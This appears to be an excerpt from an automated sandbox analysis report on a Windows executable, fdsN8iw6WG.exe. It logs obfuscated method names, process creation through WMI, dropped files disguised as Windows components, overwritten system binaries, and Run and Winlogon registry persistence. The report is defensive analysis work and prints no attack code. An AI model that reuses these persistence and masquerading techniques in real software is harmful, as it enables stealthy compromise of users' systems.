Source: fdsN8iw6WG.exe, i22CHNg8VAgxkCHTgsH.cs	High entropy of concatenated method names: 'Close', 'qL6', 'bYBgLxDwxv', 'RQWgrZLpGG', 'AXRgpkcwCQ', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: fdsN8iw6WG.exe, es4E36xhvLflKQ8cVpV.cs	High entropy of concatenated method names: 'Mc5gdYGbrl', 'pSgPpXq5JRC4joOJ8TbQ', 'NwKKSyq56QknGYvsKV8Y', 'KeMCceq5BxQrCTWrqrRt', 'kt5', 'RGJx0n771C', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: fdsN8iw6WG.exe, jQty41DceDpIm5Ue8KU.cs	High entropy of concatenated method names: 'hcsD7RuIXV', 'iLED4g9TGf', 'NshDIBLZi7', 'UtPD0RY0pd', 'GwBDm6F2Bt', 'IPyDXgr0PI', 'xchDRiweAw', 'i5wDMohldI', 'Dispose', 'taTROpqwKweifrX98qab'
Source: fdsN8iw6WG.exe, hy7sDKePfTmw36HiSHy.cs	High entropy of concatenated method names: 'buJeD4ns9R', 'nbVeQAX8xS', 'US1ewXVmuO', 'Vy8urXqgAyHnyC93ebhs', 'hZrWqEqgjHvOpBs6OZH4', 'qGZJGQqglSBWDTCyHpE4', 'y7vBCcqgVLexQXLp5Fmo', 'gJYen3sFFm', 'P1we26LUCi', 'NfieF9gZNr'
Source: fdsN8iw6WG.exe, xtdsEKbVZOiNKMuhJN1.cs	High entropy of concatenated method names: 'RfKbjQZ9GY', 'vosbO1VO0s', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'nRjbvO8prr', 'method_2', 'uc7'
Source: fdsN8iw6WG.exe, qlOw0ZeWC90JyMIrJXq.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'NSeqVjDduVT', 'D3IqJqwFuBs', 'Jm8baEqxyDuEOpKWRa5A', 'ufDBHhqx5iaIo91sWptN', 'xNdu6vqxf1r06P5QfCyE'
Source: fdsN8iw6WG.exe, PC0N114U5gAWQJqVWw9.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'KVvqVcvNvph', 'VmlqJFms92O', 'kAhMxqqZiBt7u5YnBF2q', 'i8UBjcqZbgnvyIkoTbin', 'hpli36qZxye1WKnVSmcI', 'xaOsS2qZgn1Uv23qI4vC', 'XjjxgMqZWmjLbUCveZsD'
Source: fdsN8iw6WG.exe, Q3hIox6bZvtV6VlKbc2.cs	High entropy of concatenated method names: 'H5F6PURDIf', 'zO26uj7YV8', 'ooXhS7qSZqmlpoPfuaB0', 'j9B7RZqSPIYryxjeLuCK', 'u656nQqSuAkoYl2nI3ue', 'NTF69qaSh8', 'B6KJuPqS2eKTBN2MkLqJ', 'epbn1eqSF32qIqQp7yMI', 'KpAvAHqS9xBHOoC3V7wk', 'pYW6gct8AV'
Source: fdsN8iw6WG.exe, PtTZqmUbawkgTovdKVV.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'qxiUgxUgW0', 'bJmcabqDQiLmsLxiDNGY', 'AeJWoVqDwEkWWd5wNCci', 'g9yZhlqDo2elVO5rG3cu', 'xGyUghqDCXqcuE1BbQEA', 'rieHpfqDzwS6hjvxlkjk', 'lFNa7uqQkZvLOQQHNIt9'
Source: fdsN8iw6WG.exe, Ser513JRNAVTALxlqug.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'HbnqVBifAal', 'D3IqJqwFuBs', 'DV9gsRqiW9LV5sV76sJy', 'lmCpL9qi8f7qJks7FqFb', 'hopsWrqiHQptfxrVfb1e'
Source: fdsN8iw6WG.exe, HHqrC7rAvmvPRE1QnwG.cs	High entropy of concatenated method names: 'ecPrXqXXkg', 'PHwKPGqUM9QJnocKZZlp', 'gOCd1mqUKYRGC4fyTRCV', 'N7jgIcqUXjHIeF9A5N10', 'XvPrf5qUR0SdTi9ZVf9U', 'vNU6VfqUSgAGuYijBqxV', 'IPy', 'method_0', 'method_1', 'method_2'
Source: fdsN8iw6WG.exe, KJGFmyhqDtSxl9UOGDo.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'lKQqV4KnkYM', 'dJxqVGoKtFk', 'l2D3r0qPy2emTRs2q1q9', 'M4FELHqP5TsInKv4ZHUD', 'HPtBH9qPfRuxqjHOwCQi', 'pmXLxoqPUEfLlQpym42w', 'eraDjvqP3impOKRnltoy', 'VAYX7vqPDflcRWxEJJan'
Source: fdsN8iw6WG.exe, kUhiBspQOm7LLL44pZ2.cs	High entropy of concatenated method names: 'I9npoqJqOl', 'cNLpCojD24', 'XOBpztV7F1', 'sG2Zk9Qor6', 'HbVZqfMHGY', 'vULZ6i2Q8l', 'PNqZByZ2PE', 'D0DZJTgnxD', 'vuNZYLRBFr', 'x6RZeZGiht'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\qcbjycVR.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Program Files\Microsoft\sihost.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\nASSbBeV.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\PvOoeAES.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\YehEOcJA.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\FMuYuXzk.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\iMBUyFOh.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\eWKdrIOo.log	Jump to dropped file

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File created: C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\qcbjycVR.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\iMBUyFOh.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\YehEOcJA.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\PvOoeAES.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\FMuYuXzk.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\nASSbBeV.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File created: C:\Users\user\Desktop\eWKdrIOo.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File created: C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe

Jump to dropped file

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
